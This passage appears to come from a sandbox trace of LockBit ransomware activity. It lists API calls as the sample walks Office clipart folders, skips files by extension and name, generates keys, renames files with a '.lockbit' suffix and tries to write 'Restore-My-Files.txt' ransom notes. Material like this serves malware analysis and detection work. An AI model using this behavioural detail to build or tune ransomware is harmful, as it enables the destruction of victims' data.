(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0153.143] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.146] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.146] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.147] free (_Block=0x1fa2ed8) [0153.147] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.147] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.147] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.147] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e804d00, ftCreationTime.dwHighDateTime=0x1be05ef, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e804d00, ftLastWriteTime.dwHighDateTime=0x1be05ef, nFileSizeHigh=0x0, nFileSizeLow=0x4de6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0232803.WMF", cAlternateFileName="")) returned 1 [0153.148] lstrcmpiW (lpString1=".", lpString2="J0232803.WMF") returned -1 [0153.148] lstrcmpiW (lpString1="..", lpString2="J0232803.WMF") returned -1 [0153.148] PathFindExtensionW (pszPath="J0232803.WMF") returned=".WMF" [0153.148] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.148] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.149] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.149] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0232803.WMF") returned 1 [0153.149] lstrcmpiW (lpString1="ntldr", lpString2="J0232803.WMF") returned 1 [0153.149] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0232803.WMF") returned 1 [0153.150] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0232803.WMF") returned -1 [0153.150] lstrcmpiW (lpString1="autorun.inf", lpString2="J0232803.WMF") returned -1 [0153.150] lstrcmpiW (lpString1="thumbs.db", lpString2="J0232803.WMF") returned 1 [0153.150] lstrcmpiW (lpString1="iconcache.db", lpString2="J0232803.WMF") returned -1 [0153.150] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.150] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF") returned=".WMF" [0153.150] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.150] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.150] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.151] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.151] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF.lockbit") returned 72 [0153.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232803.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0153.155] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.155] malloc (_Size=0x40068) returned 0x3d70450 [0153.155] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=19942) returned 1 [0153.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0153.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0153.156] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0153.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.160] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.160] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.161] free (_Block=0x1fa2ed8) [0153.161] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.161] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.162] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.162] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x26e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0233512.WMF", cAlternateFileName="")) returned 1 [0153.162] lstrcmpiW (lpString1=".", lpString2="J0233512.WMF") returned -1 [0153.162] lstrcmpiW (lpString1="..", lpString2="J0233512.WMF") returned -1 [0153.162] PathFindExtensionW (pszPath="J0233512.WMF") returned=".WMF" [0153.162] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.162] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.163] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.163] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0233512.WMF") returned 1 [0153.164] lstrcmpiW (lpString1="ntldr", lpString2="J0233512.WMF") returned 1 [0153.164] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0233512.WMF") returned 1 [0153.164] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0233512.WMF") returned -1 [0153.164] lstrcmpiW (lpString1="autorun.inf", lpString2="J0233512.WMF") returned -1 [0153.164] lstrcmpiW (lpString1="thumbs.db", lpString2="J0233512.WMF") returned 1 [0153.164] lstrcmpiW (lpString1="iconcache.db", lpString2="J0233512.WMF") returned -1 [0153.164] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.164] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233512.WMF") returned=".WMF" [0153.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.164] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.164] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.165] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.165] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233512.WMF.lockbit") returned 72 [0153.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233512.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233512.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0153.166] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.166] malloc (_Size=0x40068) returned 0x3e70008 [0153.167] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=9960) returned 1 [0153.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0153.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0153.168] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0153.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233512.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233512.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.186] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.186] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.187] free (_Block=0x1fa2ed8) [0153.187] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233512.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.187] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.187] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.187] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x312c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0233665.WMF", cAlternateFileName="")) returned 1 [0153.188] lstrcmpiW (lpString1=".", lpString2="J0233665.WMF") returned -1 [0153.188] lstrcmpiW (lpString1="..", lpString2="J0233665.WMF") returned -1 [0153.188] PathFindExtensionW (pszPath="J0233665.WMF") returned=".WMF" [0153.188] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.188] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.189] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.189] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0233665.WMF") returned 1 [0153.190] lstrcmpiW (lpString1="ntldr", lpString2="J0233665.WMF") returned 1 [0153.190] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0233665.WMF") returned 1 [0153.190] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0233665.WMF") returned -1 [0153.190] lstrcmpiW (lpString1="autorun.inf", 